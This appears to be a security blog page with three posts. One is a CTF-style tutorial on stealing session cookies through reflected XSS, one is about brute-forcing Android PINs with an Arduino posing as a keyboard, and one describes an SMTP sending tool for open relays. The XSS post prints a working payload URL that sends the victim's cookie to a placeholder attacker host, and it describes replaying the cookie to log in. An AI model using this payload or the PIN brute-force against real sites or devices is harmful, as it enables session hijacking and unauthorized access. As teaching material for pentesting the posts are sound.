Sunday, August 3, 2014

Refresher Series - Stealing Cookies with XSS

During Capture the Flag (CTF) events or if you are learning to pentest, sometimes you may be posed with the challenge to login to a website without having credentials.  This type of attack requires a few things generally, a website or part of one that is protected, victim, and cross site scripting.  I have also included vulnerable web server code at the bottom of the post, so you can try it yourself.

  1. The attacker finds a webserver vulnerable to XSS 
  2. The user logs into the webserver
  3. The attacker sends  message with a malicious link designed to send the cookie to the attacker
  4. The link is opened and the user unknowingly sends their cookie to the attacker
  5. The attacker is happy as he logs into the webserver

In the example we use reflected XSS, this could be done with stored also the steps would remain the same with the exception of needing to send the message to the user.
Here are the actual steps taking place:

1. Attacker finds a login page and discovers XSS.



Login Page


User input reflected back to the page
Confirmed XSS

2. A user logs into the site to preform normal business, and given a session id.

Valid user login


3. The attacker sends a malicious link in an email or some other means with this type of link which may vary or need to be encoded. 
http://192.168.1.190/login.html?user=test<script>var+i+=+new+Image();i.src="http://attackerip/gimmie.html?cookie="+document.cookie</script>&pass=test

Email tricking user to click the malicious link

4. When the link is opened it visits the page and shows an invalid user to the victim. However, in the background it sends a request to the attacker’s site with their cookie included.  Where the attacker has just a simple python web server listening. The incoming request shows the cookie: sessionid and the value of "super_secret_session". 

Incoming session information

5. The attacker then uses their preferred method to get the cookie into their browser such as a plugin like web developers toolbar for Firefox and adds the cookie.


The attacker then simply visits the site and is automatically logged in.


Below you will find the code for the vulnerable web server. Only requirement is python.

Wednesday, January 15, 2014

Brute forcing Android PIN’s with an Arduino and Authentication Weakness

Sticking with the theme this week, I have been bored and haven’t been able to sleep well. I decided to try my hand at brute forcing the PIN on my Samsung Galaxy S3.  Annoyingly enough the Android operating system thought people would do this and after 5 failed attempts you have to wait 30 seconds. Luckily, that doesn't change so automating will be easy. I have seen Hak5’s rubber ducky do this attack as it simply emulates a keyboard. So I decided to try it with my Arduino, and it works just fine.  If you went from 0000 - 9999 that would take roughly 16 hours, the odds are you would get it before then.

I also tried to play with other authentication types on my phone. The most interesting was the pattern type which now forces you to create a backup PIN. If this is set and you can’t get the pattern you can brute force the backup PIN all day and it doesn't have the 30 second delay. After 5 failed swipe attempts you get the option to enter your backup PIN. See the image below. That makes for much faster brute forcing.

The Arduino Sketch below first tries the top 20 PIN’s and then starts its brute force cycle. Yes, it will repeat those 20 eventually but we will try those first, just in case.

For this attack to work you will need an Arduino Leonardo, or an Arduino that can act as a HID (Human Interface Device), an USB OTG (on-the-go) cable and a target device. I always set my HID sketches to work with a switch as I do not want to race the clock trying to upload a new sketch.
In all seriousness this would be a last resort type of thing for me, it’s going to take a long time. I would try to narrow it down somehow, like eliminate the 0 range such as 0000-0999. Do most people start with a zero maybe not?


Finally, the backup PIN brute force in my opinion is a real issue; you could brute force that fairly quickly. 

Tuesday, January 14, 2014

Because I was bored

In my quest to continue to learn more about python I decided to try my hand at making a GUI application. I then thought why not a simple SMTP tool. Why? You ask, honestly some nights are long and boring.   I also wanted to write something cross platform so I chose wxPython. This was nothing more than a see if I can do it type of exercise. It was an experience, and lining things up wasn't fun. The other thing I wanted to do was compile it to an executable which I used PyInstaller. Shockingly because of all the added items with a GUI, the final binary turned out to be 7.5MB that's huge. This was still a fun little tool to build, and I learned a lot doing it. 

The tool is straight forward, simply put in the relevant information and hit OK to send. You will need an email server with open relay to put in to the server and port information. I use Sendmail or Postfix either work just fine. Don’t ask me how to do it, Google It


Here is an image and the code is below. I am not liable for how you use this tool and you are only allowed to use it against targets which you have permission. 


Code Below: